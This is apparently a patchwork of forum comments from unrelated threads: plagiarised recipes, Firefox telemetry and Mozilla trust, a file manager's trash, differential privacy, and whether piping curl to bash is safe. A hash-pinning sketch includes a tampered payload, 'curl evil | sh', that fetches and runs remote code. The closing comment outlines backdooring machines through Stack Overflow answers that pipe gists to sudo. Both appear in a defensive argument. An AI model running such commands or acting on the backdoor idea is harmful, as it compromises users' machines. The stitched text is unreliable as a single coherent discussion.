Alternative hypothesis: most 'secret family recipes' are in fact original. However, the average SFR never gets passed around, because it produces average-tasting food.
The recipes on food labels come from companies that know the product inside out, have an incentive to help you optimize the taste/effort tradeoff, and may have spent time and money on research. They taste better, so they're the ones people remember.
tl;dr: people remember a disproportionately high number of plagiarized recipes because those are the good ones.
Are we going to get a browser that caters to our own needs? No, evidently power users are no longer the target demographic.
Are we going to make a browser that we can recommend to our nontechie friends? No, I don't trust them to navigate all the opt-outs and dark patterns around your telemetry. I don't even trust myself to never misclick.
Is contributing going to win us goodwill from our colleagues? No, you've alienated them too.
Is this about ideology, then? Are we building a browser for a better world? ...it would be much more convincing if you guys hadn't fired your CEO over political speech.
And that's where we're at right now. Maybe the 97% or whatever non-addon-using demographic in your telemetry data will make up the shortfall in contributions.
It's the other way around, I think: telemetry isn't (wasn't?) on by default, and I enabled it on purpose. And I am a power user; that's why I don't use Chrome (1k tabs here).
I think that's what the demo showed: a deleted file is put into roamer's trash directory. So when a file is deleted (or moved), the hash points to the new location (the trash, in this case).
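If I'm reading the demo right, the mechanism is essentially a content-addressed index: files are keyed by hash, and "delete" just repoints the hash at a trash path. A minimal sketch of that idea (the index layout and the `.roamer-trash/` name are my assumptions, not roamer's actual implementation):

```python
import hashlib

# Hypothetical sketch: files tracked by content hash; deleting a file
# moves the path its hash maps to, rather than destroying the entry.
index = {}  # sha256 hex digest -> current path

def track(path: str, content: bytes) -> str:
    h = hashlib.sha256(content).hexdigest()
    index[h] = path
    return h

def delete(h: str) -> None:
    # The content isn't lost; its hash now points into the trash.
    name = index[h].rsplit("/", 1)[-1]
    index[h] = f".roamer-trash/{name}"

h = track("notes/todo.txt", b"buy milk")
delete(h)
print(index[h])  # .roamer-trash/todo.txt
```

The same repointing would cover a plain move: the hash stays stable while the path it resolves to changes.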
1. Any data collection at all deanonymizes the user, cf panopticlick.
2. Frankly, even opt-out is not acceptable. I can't recommend any software that periodically asks users for data access, since there exist non-technical users who have a nonzero chance of clicking yes to everything. If they are related to me in some way, this compromises my privacy as well.
1. Any data collection at all deanonymizes the user, cf panopticlick.
This isn't true. Panopticlick collects far more data about your browser than this proposal would. There has been a lot of research in this area, and we know how to collect anonymous datasets: https://arxiv.org/abs/1407.6981
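For anyone curious what "anonymous datasets" can mean concretely: the linked paper (RAPPOR) builds on randomized response, where each user randomizes their answer locally so no single report is meaningful, yet the aggregate is recoverable. A toy sketch of plain randomized response (much simpler than RAPPOR itself, and purely illustrative):

```python
import random

def randomized_response(truth: bool) -> bool:
    # With probability 1/2, answer truthfully; otherwise answer with a
    # fresh coin flip. Any individual "yes" is therefore deniable.
    if random.random() < 0.5:
        return truth
    return random.random() < 0.5

def estimate_true_fraction(answers: list) -> float:
    # E[observed yes-rate] = 0.25 + 0.5 * p, so invert to estimate p.
    observed = sum(answers) / len(answers)
    return (observed - 0.25) / 0.5

random.seed(0)
# Simulate 100,000 users, 30% of whom truly have the property.
truths = [random.random() < 0.3 for _ in range(100_000)]
answers = [randomized_response(t) for t in truths]
print(round(estimate_true_fraction(answers), 2))  # close to 0.3
```

The point is that the collector never learns any individual's true answer, only a noisy aggregate whose error shrinks with the number of users.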
Look at it from a security-conscious user's perspective: I would have to verify that:
1. The concept is sound.
2. It is implemented as described.
3. It is implemented with no bugs.
4. Mozilla is trustworthy.
5. Any third-parties Mozilla involves in this process are also trustworthy.
6. All of the above will remain true.
Doing this would take a tremendous amount of both time and expertise, if it's even possible. If every piece of software I used made me do this every year or so, I would get nothing else done.
In practical terms, your argument is no better than just saying, 'trust us, we're good for it', regardless of the merits of your tech. And we know Mozilla baked Google Analytics into FF's addon page, so trust is in short supply.
Except if you actually read and understood the link, points #1, 4, 5 aren't a concern. Moreover, points #2, 3, and 6 apply to just about every piece of software used.
What percentage of FF users on the planet do you expect could read a paper on differential privacy and actually verify those points, understanding all the ifs and gotchas, and tell whether any of the arguments are wrong? What percentage of that elite group would actually be willing to devote the time and energy, for free, for every one of the thousands of pieces of software they use?
Not many, certainly. Which is perhaps why it's better for this to be implemented (since differential privacy is a known, rigorous definition of privacy) than to leave it up to the large majority of users who (by your implication) don't understand it and won't be bothered to understand it.
...or you could just scrap the whole idea and not bother with it.
This is true for the user, too. If the only viable choices are 'verify claims at great cost and no gain every few months', or 'use some other privacy-respecting browser', I am going to recommend the second.
Look at it this way: whenever you run a program you didn't write yourself, you're running a bunch of commands you never checked. This is no different from, say, downloading a precompiled executable and running it, with all the same problems and tradeoffs.
It is different. While it is obviously true that I haven't checked all of the binaries I'm running, I at least can, through the various signatures involved, rely on the fact that it was created by a particular individual or group, whom I may trust.
Would you really assign the same level of trust to, e.g., a sudo(8) binary downloaded somewhere off the internet as you would to the one provided by your distribution?
That's not the comparison being made. It's between piping curl to bash and just downloading a script and running it with sudo, without inspecting it.
Yes, you "could inspect". But this is about the instructions. And instructions to pipe curl to bash are no more or less harmful than instructions to download a binary from a "random" server and run it verbatim.
"Piping curl to bash" is a red herring. It's "running unverified code" that's the problem. Piping curl to bash just makes it viscerally obvious how dangerous that is.
There are various levels of trust, of course. The packages in Debian or RedHat are more trustworthy (there is a process) than those in NPM or Maven (free-for-all, even if you have some assurance that the package you're downloading is the very same the developer uploaded).
But installing a random NPM package is no more dangerous than curl-piping a script from GitHub to bash over HTTPS (without -k). You're still sure that what you're downloading and running is what whoever controls that repo intended.
What IS more dangerous is training a generation of developers to solve problems by quickly copy-pasting random strangers' magic incantations from random blogs or Stack Overflow into their terminals. You could probably infect a large number of machines very quickly by stalking "noob" questions in certain Stack Overflow categories and giving a good answer in the form of a GitHub gist curl-piped to sudo that fixes the problem but also discreetly backdoors the machine.
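One habit that mitigates (but doesn't solve) the unverified-code problem: review a script once, pin its hash, and refuse to execute any download that differs. A small sketch of the idea; the script content here is a made-up placeholder:

```python
import hashlib

def verify_script(body: bytes, pinned_sha256: str) -> bytes:
    """Refuse to hand the shell anything other than the exact
    bytes that were reviewed and pinned by hash."""
    digest = hashlib.sha256(body).hexdigest()
    if digest != pinned_sha256:
        raise RuntimeError(f"hash mismatch: got {digest}")
    return body

# Pin the hash of the version you actually read once...
reviewed = b"#!/bin/sh\necho 'install steps go here'\n"
pin = hashlib.sha256(reviewed).hexdigest()

# ...and later, a tampered download fails loudly:
try:
    verify_script(reviewed + b"curl evil | sh\n", pin)
except RuntimeError as e:
    print("rejected:", e)

# The untampered copy passes and could then be piped to the shell.
assert verify_script(reviewed, pin) == reviewed
```

This only moves the trust question to "did I review the pinned version carefully", but it does defeat the silently-swapped-script attack that makes blind curl-piping so dangerous.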